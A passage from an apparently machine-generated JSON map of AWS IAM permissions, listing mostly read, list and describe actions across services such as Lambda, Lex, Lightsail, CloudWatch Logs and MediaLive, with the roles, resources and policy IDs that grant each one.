{"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listEventSourceMappings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listFunctionEventInvokeConfigs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listFunctions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listLayerVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listLayers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listProvisionedConcurrencyConfigs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listVersionsByFunction": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"launchwizard:describeProvisionedApp": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"launchwizard:describeProvisioningEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"launchwizard:listProvisionedApps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBot": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBotAlias": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBotAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBotChannelAssociation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBotChannelAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBotVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBuiltinIntent": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBuiltinIntents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getBuiltinSlotTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getIntent": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getIntentVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getIntents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getSlotType": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getSlotTypeVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lex:getSlotTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:getLicenseConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:getServiceSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:listAssociationsForLicenseConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:listFailuresForLicenseConfigurationOperations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:listLicenseConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:listLicenseSpecificationsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:listResourceInventory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"license-manager:listUsageForLicenseConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getActiveNames": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getBlueprints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getBundles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstanceMetricData": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstancePortStates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstanceSnapshot": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstanceSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstanceState": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getKeyPair": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getKeyPairs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getOperation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getOperations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getOperationsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getRegions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getStaticIp": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lightsail:getStaticIps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:CreateLogGroup": {"roles": {"Allow": {"AROAJY5MNJYDKGD2UIATQ": {"Resource": {"arn:aws:logs:eu-west-1:430150006394:*": {"policies": {"ANPAIDFYJXP7KKG7FLVWO": {"condition": null}}}}}}}},"logs:CreateLogStream": {"roles": {"Allow": {"AROAJY5MNJYDKGD2UIATQ": {"Resource": {"arn:aws:logs:eu-west-1:430150006394:log-group:/aws/lambda/load-wikipedia:*": {"policies": {"ANPAIDFYJXP7KKG7FLVWO": {"condition": null}}}}}}}},"logs:PutLogEvents": {"roles": {"Allow": {"AROAJY5MNJYDKGD2UIATQ": {"Resource": {"arn:aws:logs:eu-west-1:430150006394:log-group:/aws/lambda/load-wikipedia:*": {"policies": {"ANPAIDFYJXP7KKG7FLVWO": {"condition": null}}}}}}}},"logs:describeDestinations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:describeExportTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:describeLogGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:describeLogStreams": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:describeMetricFilters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:describeQueries": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:describeSubscriptionFilters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"logs:testMetricFilter": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:describeBatchPredictions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:describeDataSources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:describeEvaluations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:describeMLModels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:getBatchPrediction": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:getDataSource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:getEvaluation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"machinelearning:getMLModel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"managedblockchain:getMember": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"managedblockchain:getNetwork": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"managedblockchain:getNode": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"managedblockchain:listMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"managedblockchain:listNetworks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"managedblockchain:listNodes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:describeEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:getJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:getJobTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:getPreset": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:getQueue": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:listJobTemplates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediaconvert:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeInput": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeInputDevice": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeInputSecurityGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeMultiplex": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeOffering": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeReservation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:describeSchedule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listChannels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listInputDevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listInputSecurityGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listInputs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listMultiplexes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listOfferings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"medialive:listReservations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediapackage:describeChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediapackage:describeOriginEndpoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediapackage:listChannels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediapackage:listOriginEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediastore:describeContainer": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediastore:describeObject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediastore:getContainerPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediastore:getCorsPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediastore:listContainers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediastore:listItems": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediatailor:getPlaybackConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mediatailor:listPlaybackConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getAdmChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApnsChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApnsSandboxChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApnsVoipChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApnsVoipSandboxChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApp": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApplicationSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getApps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getBaiduChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getCampaign": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getCampaignActivities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getCampaignVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getCampaignVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getCampaigns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getEmailChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getEndpoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getEventStream": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getExportJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getExportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getGcmChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getImportJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getImportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getSegment": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getSegmentImportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getSegmentVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getSegmentVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getSegments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mobiletargeting:getSmsChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:describeBroker": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:describeConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:describeConfigurationRevision": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:describeUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:listBrokers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:listConfigurationRevisions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:listConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"mq:listUsers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:describeGlobalNetworks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:getCustomerGatewayAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"networkmanager:getDevices": 